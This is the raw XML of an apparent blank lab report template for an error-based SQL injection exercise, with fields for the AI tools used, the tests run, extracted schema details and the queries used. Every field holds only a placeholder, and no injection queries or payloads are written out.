                <w:ilvl w:val="0"/>
                <w:numId w:val="121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9CB5850" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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907FFE9" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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2F13117" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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9F4EF9C" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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4990C9C" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRPr="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="00BF75A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E600B" w:rsidRPr="00BF75A8" w14:paraId="6ECF5F06" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DB1D232" w14:textId="2DE8D8B5" w:rsidR="009E600B" w:rsidRPr="00BF75A8" w:rsidRDefault="009E600B" w:rsidP="00FA0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A7B6B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AI Tools Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58CE5951" w14:textId="365229B7" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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C030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[*ShellGPT,</w:t>
            </w:r>
            <w:r w:rsidR="004B71E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 ChatGPT,</w:t>
            </w:r>
            <w:r w:rsidRPr="002C030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 Custom Scripts, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F454FCA" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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9D9AD05" w14:textId="77777777" w:rsidR="009E600B" w:rsidRPr="00BF75A8" w:rsidRDefault="009E600B" w:rsidP="009E60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E600B" w:rsidRPr="00BF75A8" w14:paraId="7548BE3F" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C05801C" w14:textId="02B7632A" w:rsidR="009E600B" w:rsidRPr="00BA7B6B" w:rsidRDefault="009E600B" w:rsidP="00FA0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B6A7F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripts or Prompts Used for Automation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5063E181" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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2CEE1E4" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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A107AED" w14:textId="77777777" w:rsidR="009E600B" w:rsidRPr="002C030C" w:rsidRDefault="009E600B" w:rsidP="009E60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E600B" w:rsidRPr="00BF75A8" w14:paraId="4930CE13" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="701C680F" w14:textId="705E8511" w:rsidR="009E600B" w:rsidRPr="004B6A7F" w:rsidRDefault="009E600B" w:rsidP="00FA0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3422B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Extracted Information </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7523D908" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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B49EB7C" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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CD10170" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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E600B" w:rsidRPr="00BF75A8" w14:paraId="7F37583C" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1672E074" w14:textId="0940F242" w:rsidR="009E600B" w:rsidRPr="0033422B" w:rsidRDefault="009E600B" w:rsidP="00FA0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F63C0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Exploit Paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B9A7637" w14:textId="29185FDF" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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</w:t>
            </w:r>
            <w:r w:rsidR="00BE011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*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If any]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FB5E437" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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0198CB2" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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E600B" w:rsidRPr="00BF75A8" w14:paraId="7A335567" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E604575" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="00FA0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F67D1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  <w:p w14:paraId="39CF790D" w14:textId="77777777" w:rsidR="009E600B" w:rsidRPr="009F63C0" w:rsidRDefault="009E600B" w:rsidP="00FA0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7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6763C96D" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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E600B" w:rsidRPr="00BF75A8" w14:paraId="2916EDAA" w14:textId="77777777" w:rsidTr="00FA02DD">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6FA866FA" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="00FA0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b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Result Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="053A2C6E" w14:textId="77777777" w:rsidR="009E600B" w:rsidRPr="004F67D1" w:rsidRDefault="009E600B" w:rsidP="00FA02D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7132" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A8364F4" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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DC4C048" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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0114340" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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14DD7D3" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E60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3C71FAD" w14:textId="77777777" w:rsidR="009E600B" w:rsidRDefault="009E600B" w:rsidP="009E600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</w:tbl>
    <w:p w14:paraId="44BEECFD" w14:textId="77777777" w:rsidR="00BF75A8" w:rsidRDefault="00BF75A8" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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050"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875089" w:rsidRPr="00A51A96" w14:paraId="603A3FC9" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="329D8669" w14:textId="0D756D52" w:rsidR="00875089" w:rsidRPr="003C713F" w:rsidRDefault="00875089" w:rsidP="00725128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7.6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961E79" w:rsidRPr="00961E79">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Determine the Database Schema using Error-Based SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3F15AE9E" w14:textId="77777777" w:rsidR="009872DF" w:rsidRPr="00E857CC" w:rsidRDefault="009872DF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8"/>
        <w:gridCol w:w="7132"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D85036" w:rsidRPr="00D85036" w14:paraId="239924C3" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26FFDB97" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="00E857C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85036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132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="409808DF" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="00D8503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85036" w:rsidRPr="00D85036" w14:paraId="7EB195F5" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="452406D6" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="00E857C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85036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132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="122709D9" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="00D8503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85036" w:rsidRPr="00D85036" w14:paraId="32BD58CD" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DD2C6D2" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="00E857C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85036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132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A225902" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="00D8503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A5EAE" w:rsidRPr="00D85036" w14:paraId="42E7EDC0" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32DF46C5" w14:textId="47599400" w:rsidR="009A5EAE" w:rsidRPr="00D85036" w:rsidRDefault="004E626E" w:rsidP="00E857C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E626E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Test 1: SQL Injection Vulnerability Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="167FEE4E" w14:textId="77777777" w:rsidR="009A5EAE" w:rsidRPr="00CB3417" w:rsidRDefault="004E626E" w:rsidP="00D8503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CB341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B3417" w:rsidRPr="00CB341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Error Message Returned? Yes/No, Description]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41380E5B" w14:textId="77777777" w:rsidR="00CB3417" w:rsidRDefault="00CB3417" w:rsidP="00D8503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A3662BE" w14:textId="77777777" w:rsidR="00CB3417" w:rsidRDefault="00CB3417" w:rsidP="00D8503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AAABB80" w14:textId="4ED4C2F6" w:rsidR="00CB3417" w:rsidRPr="00D85036" w:rsidRDefault="00CB3417" w:rsidP="00D8503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B3417" w:rsidRPr="00D85036" w14:paraId="76932E52" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CBCD230" w14:textId="007D7B08" w:rsidR="00CB3417" w:rsidRPr="004E626E" w:rsidRDefault="00F95E54" w:rsidP="00E857C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95E54">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Test 2: Identified Table Name &amp; First Column</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2958A9B5" w14:textId="77777777" w:rsidR="00CB3417" w:rsidRDefault="00F95E54" w:rsidP="00D8503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F95E5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Table Name Found? Yes/No, Column Name Found? Yes/No, Error Message Details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906AA24" w14:textId="77777777" w:rsidR="00F95E54" w:rsidRDefault="00F95E54" w:rsidP="00D8503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2D87F29" w14:textId="3F199015" w:rsidR="00F95E54" w:rsidRPr="00CB3417" w:rsidRDefault="00F95E54" w:rsidP="00D8503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95E54" w:rsidRPr="00D85036" w14:paraId="7F8C1FB8" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AAF699B" w14:textId="3F0FFAF0" w:rsidR="00F95E54" w:rsidRPr="00F95E54" w:rsidRDefault="00F95E54" w:rsidP="00E857C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95E54">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Test 3: Extracted Additional Column Names</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4471321B" w14:textId="77777777" w:rsidR="00F95E54" w:rsidRDefault="00F95E54" w:rsidP="00D8503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8568F1" w:rsidRPr="008568F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Second Column Name Identified? Yes/No, List of Extracted Column Names if found</w:t>
            </w:r>
            <w:r w:rsidR="008568F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1390C26" w14:textId="77777777" w:rsidR="008568F1" w:rsidRDefault="008568F1" w:rsidP="00D8503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6734789" w14:textId="644B3C26" w:rsidR="008568F1" w:rsidRDefault="008568F1" w:rsidP="00D8503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8568F1" w:rsidRPr="00D85036" w14:paraId="7D958D1C" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F6A6612" w14:textId="5517283A" w:rsidR="008568F1" w:rsidRPr="00F95E54" w:rsidRDefault="008568F1" w:rsidP="00E857C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568F1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Test 4: Identified Data Types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10D1B30E" w14:textId="77777777" w:rsidR="008568F1" w:rsidRDefault="008568F1" w:rsidP="00D8503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6C49D8" w:rsidRPr="006C49D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Data Type of Extracted Columns Identified? Yes/No, Details of Findings</w:t>
            </w:r>
            <w:r w:rsidR="006C49D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52106C7" w14:textId="77777777" w:rsidR="006C49D8" w:rsidRDefault="006C49D8" w:rsidP="00D8503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FDA87B8" w14:textId="5AF82690" w:rsidR="006C49D8" w:rsidRDefault="006C49D8" w:rsidP="00D8503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F089E" w:rsidRPr="00D85036" w14:paraId="17F2B394" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CFE831A" w14:textId="25F1710C" w:rsidR="003F089E" w:rsidRPr="008568F1" w:rsidRDefault="003F089E" w:rsidP="00E857C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F089E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Extracted Database Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3235916F" w14:textId="77777777" w:rsidR="003F089E" w:rsidRDefault="003F089E" w:rsidP="00D8503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3F089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Database Name if found, SQL Query Used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7F1B41B" w14:textId="77777777" w:rsidR="003F089E" w:rsidRDefault="003F089E" w:rsidP="00D8503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AF87023" w14:textId="06F93AFB" w:rsidR="003F089E" w:rsidRDefault="003F089E" w:rsidP="00D8503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65E64" w:rsidRPr="00D85036" w14:paraId="67D80E25" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2061FEBF" w14:textId="28BCE965" w:rsidR="00B65E64" w:rsidRPr="003F089E" w:rsidRDefault="0066091C" w:rsidP="00E857C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6091C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Extracted First Database Table Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04F1EC3C" w14:textId="77777777" w:rsidR="00B65E64" w:rsidRDefault="0066091C" w:rsidP="00D8503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66091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Table Name if found, SQL Query Used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98FBD92" w14:textId="77777777" w:rsidR="0066091C" w:rsidRDefault="0066091C" w:rsidP="00D8503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A76BA5A" w14:textId="38C0E1EE" w:rsidR="0066091C" w:rsidRDefault="0066091C" w:rsidP="00D8503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6091C" w:rsidRPr="00D85036" w14:paraId="1292DA51" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C190798" w14:textId="106F5132" w:rsidR="0066091C" w:rsidRPr="0066091C" w:rsidRDefault="0066091C" w:rsidP="00E857C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6091C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Extracted First Column Name of First Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CCF9163" w14:textId="77777777" w:rsidR="0066091C" w:rsidRDefault="0066091C" w:rsidP="00D8503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608C6" w:rsidRPr="00C608C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Column Name if found, SQL Query Used</w:t>
            </w:r>
            <w:r w:rsidR="00C608C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A45F303" w14:textId="77777777" w:rsidR="00C608C6" w:rsidRDefault="00C608C6" w:rsidP="00D8503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8C87857" w14:textId="77777777" w:rsidR="00C608C6" w:rsidRDefault="00C608C6" w:rsidP="00D8503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745246A" w14:textId="5754D8AE" w:rsidR="00C608C6" w:rsidRDefault="00C608C6" w:rsidP="00D8503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C608C6" w:rsidRPr="00D85036" w14:paraId="2602115D" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1112BD5C" w14:textId="2C7E3302" w:rsidR="00C608C6" w:rsidRPr="0066091C" w:rsidRDefault="00C608C6" w:rsidP="00E857C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608C6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Extracted First Field of First Row (Data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16F73D94" w14:textId="109F8BAC" w:rsidR="00C608C6" w:rsidRDefault="00C608C6" w:rsidP="00D8503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C608C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Data Extracted if found, SQL Query Used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D85036" w:rsidRPr="00D85036" w14:paraId="3B5D4425" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:trHeight w:val="1628"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="314ACBE2" w14:textId="58C10107" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00CA7041" w:rsidP="00E857C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 xml:space="preserve">Other </w:t>
            </w:r>
            <w:r w:rsidR="00D85036" w:rsidRPr="00D85036">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SQL Injection Queries/URLs Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D7C7DE9" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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BF72132" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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2C154ED" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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DE3F92A" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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DDA9DC5" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12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6E35C6A" w14:textId="77777777" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00D85036" w:rsidP="00D8503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85036" w:rsidRPr="00D85036" w14:paraId="1733D570" w14:textId="77777777" w:rsidTr="00E857CC">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2228" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="040C2007" w14:textId="58FED6DB" w:rsidR="00D85036" w:rsidRPr="00D85036" w:rsidRDefault="00B65E64" w:rsidP="00E857C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="00D85036" w:rsidRPr="00D85036">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Information Collected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7132" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
